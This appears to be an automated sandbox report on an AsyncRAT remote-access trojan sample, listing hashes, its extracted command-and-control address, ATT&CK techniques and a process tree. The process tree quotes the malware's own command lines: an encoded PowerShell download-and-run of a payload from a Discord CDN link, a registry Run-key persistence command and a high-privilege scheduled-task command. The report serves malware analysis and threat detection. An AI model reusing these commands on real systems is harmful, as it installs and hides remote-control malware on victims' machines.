asyncrat | 9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea

Analysis

max time kernel
144s
max time network
152s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
06-12-2022 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea.exe
Size

6KB
MD5

43092801b433d21c31682428366f4e4c
SHA1

2935b85e09a0f78224755a6ebd443cf067705ade
SHA256

9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea
SHA512

680a7ab8d7f5ed6222451ed50806040b3ad1454d4d4aa737ff205614277cb57b294c707148fbb6aa4cd68d5ceb48454d3d9396fa795da29469692e3bb7eab873
SSDEEP

96:Vqni791kCFjoYD966lyUqEwhAY0s0vk+WjD1TIoDjpWwQPWw3d3ojarl:Vq091PFrD6UqExYMvkXhpWwAWed5

Score

10^/10

asyncrat system guard runtime persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4880-206-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/4880-208-0x000000000040D0EE-mapping.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 3944 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

JDSG4.exe

pid process

4852 JDSG4.exe

flow	pid	process
3	3944	powershell.exe

pid	process
4852	JDSG4.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

JDSG4.exe

description pid process target process

PID 4852 set thread context of 4880 4852 JDSG4.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4092 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3944 powershell.exe
3944 powershell.exe
3944 powershell.exe
3816 powershell.exe
3816 powershell.exe
3816 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3944 powershell.exe
Token: SeDebugPrivilege 3816 powershell.exe

description	pid	process	target process
PID 4852 set thread context of 4880	4852	JDSG4.exe	RegAsm.exe

pid	process
4092	schtasks.exe

pid	process
3944	powershell.exe
3944	powershell.exe
3944	powershell.exe
3816	powershell.exe
3816	powershell.exe
3816	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	3816	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea.exepowershell.exeJDSG4.execmd.exe

description	pid	process	target process
PID 2704 wrote to memory of 3944	2704	9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea.exe	powershell.exe
PID 2704 wrote to memory of 3944	2704	9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea.exe	powershell.exe
PID 3944 wrote to memory of 4852	3944	powershell.exe	JDSG4.exe
PID 3944 wrote to memory of 4852	3944	powershell.exe	JDSG4.exe
PID 3944 wrote to memory of 4852	3944	powershell.exe	JDSG4.exe
PID 4852 wrote to memory of 3816	4852	JDSG4.exe	powershell.exe
PID 4852 wrote to memory of 3816	4852	JDSG4.exe	powershell.exe
PID 4852 wrote to memory of 3816	4852	JDSG4.exe	powershell.exe
PID 4852 wrote to memory of 1940	4852	JDSG4.exe	cmd.exe
PID 4852 wrote to memory of 1940	4852	JDSG4.exe	cmd.exe
PID 4852 wrote to memory of 1940	4852	JDSG4.exe	cmd.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 4852 wrote to memory of 4880	4852	JDSG4.exe	RegAsm.exe
PID 1940 wrote to memory of 4092	1940	cmd.exe	schtasks.exe
PID 1940 wrote to memory of 4092	1940	cmd.exe	schtasks.exe
PID 1940 wrote to memory of 4092	1940	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea.exe
"C:\Users\Admin\AppData\Local\Temp\9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAawBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADEANAAwADEANgAzADEANwA1ADEAMwAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHcAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAZABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcANAAuAGUAeABlACcAKQApADwAIwBuAHEAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABqAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARwA0AC4AZQB4AGUAJwApADwAIwB5AHUAZQAjAD4A"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944

C:\Users\Admin\AppData\Roaming\JDSG4.exe
"C:\Users\Admin\AppData\Roaming\JDSG4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:4880

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
4⤵
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:4092

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b92ac1c24732f1bda02359b63a96519c

SHA1
63026aef1c0b0684efeef7f5e1f20337004ab999

SHA256
a7586aec1a17af4181734f77db85c1fbab13758ea2cc31f6c4d71398b38f42f0

SHA512
5086ffb66f3f3a0a8284bab0eaab437917365516c14c5ffce0522f87fdfd7461ce89443ee399c242580e9c41ecda58ccd2e7cb1259ec44c03f6b0eb49436f9d6

Download Submit
C:\Users\Admin\AppData\Roaming\JDSG4.exe
Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\JDSG4.exe
Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
memory/1940-195-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/1940-198-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/1940-200-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/1940-199-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/1940-192-0x0000000000000000-mapping.dmp

Download
memory/1940-212-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/2704-115-0x0000000000A20000-0x0000000000A28000-memory.dmp

Filesize
32KB

Download
memory/3816-330-0x00000000079D0000-0x0000000007A36000-memory.dmp

Filesize
408KB

Download
memory/3816-207-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-357-0x0000000009040000-0x0000000009073000-memory.dmp

Filesize
204KB

Download
memory/3816-341-0x0000000008180000-0x00000000081F6000-memory.dmp

Filesize
472KB

Download
memory/3816-374-0x0000000009370000-0x0000000009415000-memory.dmp

Filesize
660KB

Download
memory/3816-337-0x0000000008300000-0x000000000834B000-memory.dmp

Filesize
300KB

Download
memory/3816-336-0x00000000079B0000-0x00000000079CC000-memory.dmp

Filesize
112KB

Download
memory/3816-378-0x00000000095B0000-0x0000000009644000-memory.dmp

Filesize
592KB

Download
memory/3816-332-0x0000000007A40000-0x0000000007D90000-memory.dmp

Filesize
3.3MB

Download
memory/3816-331-0x0000000007180000-0x00000000071E6000-memory.dmp

Filesize
408KB

Download
memory/3816-190-0x0000000000000000-mapping.dmp

Download
memory/3816-327-0x00000000070E0000-0x0000000007102000-memory.dmp

Filesize
136KB

Download
memory/3816-300-0x0000000007230000-0x0000000007858000-memory.dmp

Filesize
6.2MB

Download
memory/3816-581-0x0000000009510000-0x000000000952A000-memory.dmp

Filesize
104KB

Download
memory/3816-272-0x0000000004660000-0x0000000004696000-memory.dmp

Filesize
216KB

Download
memory/3816-191-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-205-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-358-0x0000000009020000-0x000000000903E000-memory.dmp

Filesize
120KB

Download
memory/3816-209-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-211-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-214-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-586-0x00000000094F0000-0x00000000094F8000-memory.dmp

Filesize
32KB

Download
memory/3816-204-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-604-0x0000000009560000-0x000000000957A000-memory.dmp

Filesize
104KB

Download
memory/3816-197-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-605-0x0000000009650000-0x0000000009672000-memory.dmp

Filesize
136KB

Download
memory/3816-193-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-203-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3816-194-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/3944-122-0x000001F1EE960000-0x000001F1EE982000-memory.dmp

Filesize
136KB

Download
memory/3944-116-0x0000000000000000-mapping.dmp

Download
memory/3944-127-0x000001F1EEB10000-0x000001F1EEB86000-memory.dmp

Filesize
472KB

Download
memory/4092-240-0x0000000000000000-mapping.dmp

Download
memory/4852-162-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-160-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-184-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-185-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-186-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-187-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-188-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-189-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-182-0x0000000004E80000-0x000000000537E000-memory.dmp

Filesize
5.0MB

Download
memory/4852-181-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-180-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-179-0x00000000001D0000-0x00000000001EC000-memory.dmp

Filesize
112KB

Download
memory/4852-178-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-177-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-201-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-202-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-176-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-175-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-174-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-173-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-196-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-172-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-171-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-142-0x0000000000000000-mapping.dmp

Download
memory/4852-145-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-146-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-170-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-169-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-147-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-168-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-167-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-166-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-165-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-164-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-163-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-161-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-159-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-183-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-158-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-157-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-156-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-155-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-154-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-152-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-151-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-150-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-149-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4852-148-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4880-213-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4880-210-0x0000000077960000-0x0000000077AEE000-memory.dmp

Filesize
1.6MB

Download
memory/4880-208-0x000000000040D0EE-mapping.dmp

Download
memory/4880-206-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download